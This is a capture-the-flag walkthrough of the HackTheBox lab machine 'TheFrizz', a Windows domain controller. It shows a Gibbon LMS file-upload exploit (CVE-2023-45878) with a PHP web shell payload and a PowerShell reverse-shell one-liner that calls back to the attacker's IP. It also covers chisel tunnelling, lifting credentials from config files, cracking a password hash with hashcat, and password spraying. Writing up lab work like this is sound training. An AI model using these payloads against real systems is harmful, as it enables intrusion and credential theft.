TheFrizz

AD box on HTB.

Enumeration:

Port Scanning:

Nmap:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.20.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-17 20:31 +03
Nmap scan report for 10.129.20.43                                                    
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-09-17 20:31:40 +03 for 258s
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
22/tcp    open  ssh           syn-ack ttl 127 OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods:                                                                      
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-18 00:32:39Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
<snipped>                                                                                               
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: 7h00m01s
<snipped>

We have another AD DC, but this time we have ports 22, and 80 open.

Lets get the FQDN using netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb 10.129.20.43
SMB         10.129.20.43    445    10.129.20.43     [*]  x64 (name:10.129.20.43) (domain:10.129.20.43) (signing:True) (SMBv1:False) (NTLM:False)

We will notice the NTLM authentication is disabled, so we have to use kerberos only.

I will get the FQDN from the nmap result above, and pass it to netexec, and we will see that it resolved the FQDN to the corresponding IP address:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb FRIZZDC.frizz.htb -k                                                      
SMB         FRIZZDC.frizz.htb 445    FRIZZDC          [*]  x64 (name:FRIZZDC) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)

I will add it to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
<snipped>                                              

10.129.20.43 FRIZZDC.frizz.htb frizz.htb FRIZZDC

Also in the nmap result we will see the clock skew is too great, so I will use ntpdate to sync:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ sudo ntpdate 10.129.20.43                                             
2025-09-18 05:27:11.891187 (+0300) +25202.019863 +/- 0.074320 10.129.20.43 s1 no-leap 
CLOCK: time stepped by 25202.019863

Lets get a quick overview of the web application framework or stack via whatweb:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ whatweb http://frizz.htb/                                                                                                                                              
http://frizz.htb/ [302 Found] Apache[2.4.58], Country[RESERVED][ZZ], HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12], IP[10.129.20.43], OpenSSL[3.1.3], PHP[8.2.
12], RedirectLocation[http://frizzdc.frizz.htb/home/], Title[302 Found]

So the webserver is apache, and we have PHP as the backend language, and it redirects us to frizzdc.frizz.htb.

Lets open it up with Firefox:

Nothing really interesting, but click on staff login:

We will find gibbon lms framework is running on the webserver, and it exposes its current version which is 25.

Exploitation:

Search for any public exploits:

We will come across this web page that outlines the vulnerability and its severity and some references:

Gibbon LMS <= v25.0.01 - File Upload to RCE (CVE-2023-45878)Pentest-Tools.com

Scroll down, we will find POC in one of the references:

usd-2023-0025 - usd HeroLabusd HeroLab

Vulnerable code:

$img = $_POST['img'] ?? null;
$imgPath = $_POST['path'] ?? null;
$gibbonPersonID = !empty($_POST['gibbonPersonID']) ? str_pad($_POST['gibbonPersonID'], 10, '0', STR_PAD_LEFT) : null;
$absolutePath = $gibbon->session->get('absolutePath');

if (empty($img) || empty($gibbonPersonID) || empty($absolutePath)) {
    return;
}

// Decode raw image data
list($type, $img) = explode(';', $img);
list(, $img)      = explode(',', $img);
$img = base64_decode($img);

We will see that it accepts a file without any sanitation, and it decodes the content of a file in this case an image, where we can inject our payload.

The POC mentioned by that guy:

POST /modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1
Host: localhost:8080
[...]


img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=asdf.php&gibbonPersonID=0000000001

There are multiple exploits on github, but to not be a script kiddie, I will exploit it manually.

Craft the POST request and send it via BurpSuite.

I will write a simple php web shell:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat simple_webshell.php
<?php system($_REQUEST['cmd']); ?>


┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat simple_webshell.php | base64
PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pgo=

Before sending the request, we have to URL encode the payload, and add x-www-form-urlencoded to content-type header, so the application knows what we are sending to it:

Now lets try to run whoami:

Reverse shell as w.webservice:

We can use web cradle to get a reverse shell.

From nishang powershell scripts, I will grab the powershell tcp onliner, and edit it to add my own IP address and the port we want the connect to go to:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat shell.ps1        
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Start a python web server to host the shell.ps1:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Also start our netcat listener:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...  

Execute our powershell cradle:

10.129.20.43 - - [18/Sep/2025 06:21:47] "GET /shell.ps1 HTTP/1.1" 200 -

And we will get a reverse shell:

connect to [10.10.16.2] from (UNKNOWN) [10.129.20.43] 60837

PS C:\xampp\htdocs\Gibbon-LMS> whoami
frizz\w.webservice

After doing some enumeration, we will find config.php file which often has some useful information:

PS C:\xampp\htdocs\Gibbon-LMS> dir


    Directory: C:\xampp\htdocs\Gibbon-LMS


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
<snipped>
-a----         1/20/2023   6:04 AM         294353 composer.lock
-a----        10/11/2024   8:15 PM           1307 config.php
-a----         1/20/2023   6:04 AM           3733 error.php
<snipped>

Read it:

PS C:\xampp\htdocs\Gibbon-LMS> cat config.php                                                                                                                              
<?php                                                                                
<snipped>
$databaseServer = 'localhost';                                                       
$databaseUsername = 'MrGibbonsDB';                                                   
$databasePassword = 'MisterGibbs!Parrot!?1';                                                                                                                               
$databaseName = 'gibbon';                                                            
<snipped>

Here we have username and password for a database, we can interact with it with mysql.exe present on the target system, or perform port forwarding to use the kali's mysql.

Check what local ports are open:

PS C:\Windows\Tasks> netstat -ano | findstr LISTENING
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       2016
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2160
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       956
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       956
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       3696
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       1908
<snipped>  

We will see mysql running locally.

Port Forwarding:

I will upload chisel.exe to a writeable directory:

PS C:\xampp\htdocs\Gibbon-LMS> cd \Windows\Tasks              
PS C:\Windows\Tasks> curl http://10.10.16.2/chisel.exe -o chisel.exe

Start the server:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ /opt/Tools/Pivoting/chisel/chisel server -p 1234 -reverse
2025/09/17 21:57:50 server: Reverse tunnelling enabled
2025/09/17 21:57:50 server: Fingerprint GFrBWG+7hbItUPCGoJBC62XRgF0hNLEFG8lie613IAY=
2025/09/17 21:57:50 server: Listening on http://0.0.0.0:1234

Then run the client to forward port 3306 on local host to our machine:

PS C:\Windows\Tasks> .\chisel.exe client 10.10.16.2:1234 R:3306:localhost:3306

We will recieve the connection on our server:

2025/09/17 21:59:11 server: session#1: tun: proxy#R:3306=>localhost:3306: Listening

Check for listening ports on our kali VM:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
<snipped>                                                                            
tcp6       0      0 :::3306                 :::*                    LISTEN      163382/chisel
<snipped>
tcp6       0      0 10.10.16.2:1234         10.129.20.43:60843      ESTABLISHED 163382/chisel
<snipped>

Authenticate to the database with the credentials we found earlier:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ mysql -h localhost -u MrGibbonsDB -p -P 3306 --skip-ssl
Enter password: MisterGibbs!Parrot!?1
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 61
Server version: 10.4.32-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

We can start enumerating the database for any appealing data:

 MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| gibbon             |
| information_schema |
| test               |
+--------------------+
3 rows in set (0.266 sec)

MariaDB [(none)]> use gibbon;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [gibbon]> show tables;
+---------------------------------------+
| Tables_in_gibbon                      |
<snipped>
| gibbonpayment                         |
| gibbonpermission                      |
| gibbonperson                          |
| gibbonpersonaldocument                |
<snipped>
+---------------------------------------+
191 rows in set (0.279 sec)

We will find gibbonperson table, we can use desc to check its columns:

MariaDB [gibbon]> desc gibbonperson;
+---------------------------+-------------------------------------------------------+------+-----+-------------+----------------+
| Field                     | Type                                                  | Null | Key | Default     | Extra          |
+---------------------------+-------------------------------------------------------+------+-----+-------------+----------------+
<snipped>
| gender                    | enum('M','F','Other','Unspecified')                   | NO   |     | Unspecified |                |
| username                  | varchar(20)                                           | NO   | UNI | NULL        |                |
| passwordStrong            | varchar(255)                                          | NO   |     | NULL        |                |
| passwordStrongSalt        | varchar(255)                                          | NO   |     | NULL        |                |
| passwordForceReset        | enum('N','Y')                                         | NO   |     | N           |                |
<snipped>
+---------------------------+-------------------------------------------------------+------+-----+-------------+----------------+
94 rows in set (0.263 sec)

What we are interested in only is username, passwordstrong, and passwordstrongsalt:

MariaDB [gibbon]> select username, passwordStrong, passwordStrongSalt from gibbonperson;
+-----------+------------------------------------------------------------------+------------------------+
| username  | passwordStrong                                                   | passwordStrongSalt     |
+-----------+------------------------------------------------------------------+------------------------+
| f.frizzle | 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 | /aACFhikmNopqrRTVz2489 |
+-----------+------------------------------------------------------------------+------------------------+
1 row in set (0.254 sec)

MariaDB [gibbon]> exit

Save the hash and the salt to a file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat f.frizzle.hash                                                                          
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489

We can check the hash type with a tool called haiti:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ haiti '067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03'
SHA-256 [HC: 1400] [JtR: raw-sha256]
<snipped>

So it is sha256 with salt.

Lets explore hashcat modes:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ hashcat -h                                                                                                             
hashcat (v6.2.6) starting in help mode                                                                                                                                     
                                                                                                                                                                           
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...

<snipped>
   1410 | sha256($pass.$salt)                                        | Raw Hash salted and/or iterated
   1420 | sha256($salt.$pass)                                        | Raw Hash salted and/or iterated
  22300 | sha256($salt.$pass.$salt)                                  | Raw Hash salted and/or iterated
  20720 | sha256($salt.sha256($pass))                                | Raw Hash salted and/or iterated
  21420 | sha256($salt.sha256_bin($pass))                            | Raw Hash salted and/or iterated
   1440 | sha256($salt.utf16le($pass))                               | Raw Hash salted and/or iterated
  20800 | sha256(md5($pass))                                         | Raw Hash salted and/or iterated
  20710 | sha256(sha256($pass).$salt)                                | Raw Hash salted and/or iterated
  21400 | sha256(sha256_bin($pass))                                  | Raw Hash salted and/or iterated
   1430 | sha256(utf16le($pass).$salt)                               | Raw Hash salted and/or iterated
<snipped>

We can try multiple of those hash modes, but also since the gibbon is open-source framework and we can view its code we can check as well for the algorithm used to hash the passwords.

I tried 1410, but could not find anything, but when I used 1420:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ hashcat -m 1420 f.frizzle.hash /usr/share/wordlists/rockyou.txt --username        
hashcat (v6.2.6) starting

<snipped>
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1420 (sha256($salt.$pass))
Hash.Target......: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff...Vz2489
Time.Started.....: Wed Sep 17 22:25:14 2025 (5 secs)
Time.Estimated...: Wed Sep 17 22:25:19 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2368.9 kH/s (0.17ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11022336/14344385 (76.84%)
Rejected.........: 0/11022336 (0.00%)
Restore.Point....: 11019264/14344385 (76.82%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Jensta -> JazIris@@
Hardware.Mon.#1..: Util: 19%

<snipped>

Here we have valid credentials for a domain user (f.frizzle):

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u f.frizzle -p 'Jenni_Luvs_Magic23'
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23

Shell as f.frizzle:

Get a TGT for f.frizzle with impacket-getTGT, and export it to KRB5CCNAME:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23 -dc-ip 10.129.20.43
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in f.frizzle.ccache

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ export KRB5CCNAME=f.frizzle.ccache

Now we can authenticate via ssh.

But before that we will create krb5 file so our kali knows where to go when we are dealing with kerberos:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz] 
└─$ netexec smb frizzdc.frizz.htb --generate-krb5-file krb5.conf└─$ nxc smb frizzdc.frizz.htb -k --generate-krb5-file krb5.conf
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ cat krb5.conf

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = FRIZZ.HTB

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
        default_domain = frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB
    
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ sudo cp krb5.conf /etc/krb5.conf

Authenticate with ssh:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ klist                                                                                                                                                                  
Ticket cache: FILE:f.frizzle.ccache                                                                                                                                        
Default principal: f.frizzle@FRIZZ.HTB                                                                                                                                     
                                                                                                                                                                           
Valid starting       Expires              Service principal                                                                                                                
09/18/2025 05:49:50  09/18/2025 15:49:50  krbtgt/FRIZZ.HTB@FRIZZ.HTB                                                                                                       
        renew until 09/19/2025 05:49:49                                                                                                                                    
09/18/2025 05:50:58  09/18/2025 15:49:50  ldap/frizzdc.frizz.htb@FRIZZ.HTB                                                                                                 
        renew until 09/19/2025 05:49:49
        
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ ssh f.frizzle@frizz.htb                                                                                                                                                
The authenticity of host 'frizz.htb (10.129.20.43)' can't be established.                                                                                                  
ED25519 key fingerprint is SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g.                                                                                             
This host key is known by the following other names/addresses:                                                                                                             
    ~/.ssh/known_hosts:8: [hashed name]                                                                                                                                    
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                                                                                                   
Warning: Permanently added 'frizz.htb' (ED25519) to the list of known hosts.                                                                                               
PowerShell 7.4.5                                                                                                                                                           
PS C:\Users\f.frizzle>

Lateral Movement to m.schoolbus:

Local Enumeration:

After doing some enumeration, I found a 7z file stored in the recycle bin of f.frizzle:

PS C:\> dir -force                                                                                                                                                         
                                                                                                                                                                           
    Directory: C:\                                                                                                                                                         
                                                                                                                                                                           
Mode                 LastWriteTime         Length Name                                                                                                                     
----                 -------------         ------ ----
d--hs           9/17/2025  8:33 PM                $RECYCLE.BIN
d--h-           3/10/2025  3:31 PM                $WinREAgent
d--hs           7/24/2025 12:41 PM                Config.Msi
l--hs          10/29/2024  9:12 AM                Documents and Settings -> C:\Users
d----           3/10/2025  3:39 PM                inetpub
d----            5/8/2021  1:15 AM                PerfLogs
d-r--           7/24/2025 12:41 PM                Program Files
d----            5/8/2021  2:34 AM                Program Files (x86)
d--h-           2/20/2025  2:50 PM                ProgramData
d--hs          10/29/2024  9:12 AM                Recovery
d--hs          10/29/2024  7:25 AM                System Volume Information
d-r--          10/29/2024  7:31 AM                Users
d----           3/10/2025  3:41 PM                Windows
d----          10/29/2024  7:28 AM                xampp
-a-hs          10/29/2024  8:27 AM          12288 DumpStack.log.tmp

PS C:\> cd '$RECYCLE.BIN'
PS C:\$RECYCLE.BIN> dir -force

    Directory: C:\$RECYCLE.BIN

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--hs          10/29/2024  7:31 AM                S-1-5-21-2386970044-1145388522-2932701813-1103
d--hs           9/17/2025  8:33 PM                S-1-5-21-2386970044-1145388522-2932701813-1120

PS C:\$RECYCLE.BIN> cd 'S-1-5-21-2386970044-1145388522-2932701813-1103'
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> dir -force

    Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---          10/29/2024  7:31 AM            148 $IE2XMEG.7z
-a---          10/24/2024  9:16 PM       30416987 $RE2XMEG.7z
-a-hs          10/29/2024  7:31 AM            129 desktop.ini

PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> type '$IE2XMEG.7z'
<snipped>C:\Users\f.frizzle\AppData\Local\Temp\wapt-backup-sunday.7z

Copy it to our local machine via scp:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ scp f.frizzle@frizz.htb:'C:\\$RECYCLE.BIN\\S-1-5-21-2386970044-1145388522-2932701813-1103\\$RE2XMEG.7z' .
C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z                                                               100%   29MB   2.7MB/s   00:10 

Rename it and unzip it to see what it contains:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ mv C:\\\$RECYCLE.BIN\\S-1-5-21-2386970044-1145388522-2932701813-1103\\\$RE2XMEG.7z wapt-backup-sunday.7z

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ mkdir backup                                                                                                                                                           
                                                                                                                                                                           
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ cd backup                                                                                                                                                              
                                                                                                                                                                           ┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/backup]                                                                                                                  
└─$ 7z x ../wapt-backup-sunday.7z                                                                                                                                          
                                                                                                                                                                           
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03                                                                                                       
<snipped>                                                                                                                                                      

Everything is Ok                                                            

Folders: 684
Files: 5384
Size:       141187501
Compressed: 30416987

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/backup]
└─$ ls
wapt

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/backup]
└─$ cd wapt      

┌──(kali㉿kali)-[~/…/HackTheBox/TheFrizz/backup/wapt]
└─$ ls -la
total 45012
drwxrwxr-x 18 kali kali    4096 Oct 23  2024 .
drwxrwxr-x  3 kali kali    4096 Sep 18 07:09 ..
-rw-rw-r--  1 kali kali    6147 Sep 11  2024 auth_module_ad.py
drwxrwxr-x  3 kali kali    4096 Oct 23  2024 cache
-rw-rw-r--  1 kali kali  412462 Sep 11  2024 common.py
drwxrwxr-x  2 kali kali    4096 Oct 23  2024 conf
drwxrwxr-x  2 kali kali    4096 Oct 23  2024 conf.d
-rw-rw-r--  1 kali kali    5730 Sep 11  2024 COPYING.txt
<snipped>

We have conf folder.

See what files in it:

┌──(kali㉿kali)-[~/…/HackTheBox/TheFrizz/backup/wapt]                                
└─$ cd conf                                                                          
                                                                                     
┌──(kali㉿kali)-[~/…/TheFrizz/backup/wapt/conf]                                      
└─$ ls                                                                               
ca-192.168.120.158.crt  ca-192.168.120.158.pem  forward_ssl_auth.conf  require_ssl_auth.conf  uwsgi_params  waptserver.ini  waptserver.ini.template

One of the files has an juicy string:

┌──(kali㉿kali)-[~/…/TheFrizz/backup/wapt/conf]                                      
└─$ cat waptserver.ini                                                               
[options]                                                                            
allow_unauthenticated_registration = True                                            
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt

[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log


┌──(kali㉿kali)-[~/…/TheFrizz/backup/wapt/conf]
└─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d           
!suBcig@MehTed!R

Spray it across all users:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u users.txt -p '!suBcig@MehTed!R' --continue-on-success
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED 
<snipped>
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED 
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R 
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\d.hudson:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED 
<snipped>

We have another valid domain user's password.

BloodHound:

Now its the time for BloodHound.

Run the ingesters:

RustHound

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/bloodhound]05:51:11 [2704/3162]
└─$ rusthound-ce -k -u f.frizzle -d frzzdc.frizz.htb -f frizzdc.frizz.htb -i 10.129.20.43 -n 10.129.20.43
---------------------------------------------------
Initializing RustHound-CE at 05:50:56 on 09/18/25
Powered by @g0h4n_0
---------------------------------------------------

[2025-09-18T02:50:56Z INFO  rusthound_ce] Verbosity level: Info
[2025-09-18T02:50:56Z INFO  rusthound_ce] Collection method: All
[2025-09-18T02:51:00Z INFO  rusthound_ce::ldap] Connected to FRZZDC.FRIZZ.HTB Active Directory!
[2025-09-18T02:51:00Z INFO  rusthound_ce::ldap] Starting data collection...
[2025-09-18T02:51:00Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:02Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=frizz,DC=htb
[2025-09-18T02:51:02Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:07Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=frizz,DC=htb
[2025-09-18T02:51:07Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=frizz,DC=htb
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=frizz,DC=htb
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:11Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=frizz,DC=htb
[2025-09-18T02:51:11Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-18T02:51:11Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 22 users parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_users.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 61 groups parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_groups.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_computers.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 2 ous parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_ous.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 3 domains parsed!
